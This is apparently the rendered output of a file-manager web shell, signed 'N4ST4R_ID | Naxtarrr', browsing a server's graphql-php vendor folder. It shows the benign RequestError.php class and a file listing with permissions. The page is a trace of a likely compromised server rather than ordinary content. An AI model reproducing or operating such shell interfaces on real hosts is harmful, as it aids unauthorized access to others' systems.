Submit
Path:
~
/
/
opt
/
psa
/
admin
/
plib
/
vendor
/
webonyx
/
graphql-php
/
src
/
Server
/
File Content:
RequestError.php
<?php declare(strict_types=1); namespace GraphQL\Server; use GraphQL\Error\ClientAware; class RequestError extends \Exception implements ClientAware { public function isClientSafe(): bool { return true; } }
Submit
FILE
FOLDER
INFO
Name
Size
Permission
Action
Exception
---
0755
Helper.php
19264 bytes
0644
OperationParams.php
3537 bytes
0644
RequestError.php
230 bytes
0644
ServerConfig.php
8779 bytes
0644
StandardServer.php
5142 bytes
0644
N4ST4R_ID | Naxtarrr